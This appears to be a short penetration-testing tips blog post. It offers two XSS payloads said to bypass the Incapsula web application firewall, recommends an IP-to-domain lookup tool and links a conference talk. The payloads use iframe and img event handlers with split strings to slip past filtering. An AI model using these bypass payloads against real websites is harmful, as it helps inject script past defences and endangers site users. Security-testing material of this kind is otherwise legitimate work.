Hi Guys,
Time some more hacker’s TLC. Or Tips and tricks for penetration testers!
Anyway, here we go!
Technique:
2 Incapsula WAF XSS Bypasses
I haven’t had a chance to use these yet but I do encounter Incapsula once in a while so I’ll keep then in my bag
- <iframe/onload=’this[“src”]=”javas	cript:al”+”ert“”‘;>
- <img/src=q onerror=’new Function`al\ert\`1\“’>
Tool:
IPtoDomain
This tool I have had some great findings with. Be careful though because it grabs historic information from Virustotal which means a lot of it is outdated.
Lecture:
Title of the lecture is “It’s Fine,” They Said. “Just Ship It,” They Said.
Crazy things you can find on the internet, promise this lecture will make you smile or it might even make you laugh. Love all of this guys lectures.
Check out all the entries of this series!
- Technique Tool and Lecture #14
- Technique Tool and Lecture #13
- Technique, Tool and Lecture #12
- Technique, Tool and Lecture #11
- Technique Tool and Lecture #10
- Technique, Tool and Lecture #9
- Technique, Tool and Lecture #8
- Technique, Tool and Lecture #7
- Technique, Tool and Lecture #6
- Technique, Tool and Lecture #5
- Technique, Tool and Lecture #4
- Technique, Tool and Lecture #3
- Technique, Tool and Lecture #2
- Technique, Tool and Lecture #1
END TRANSMISSION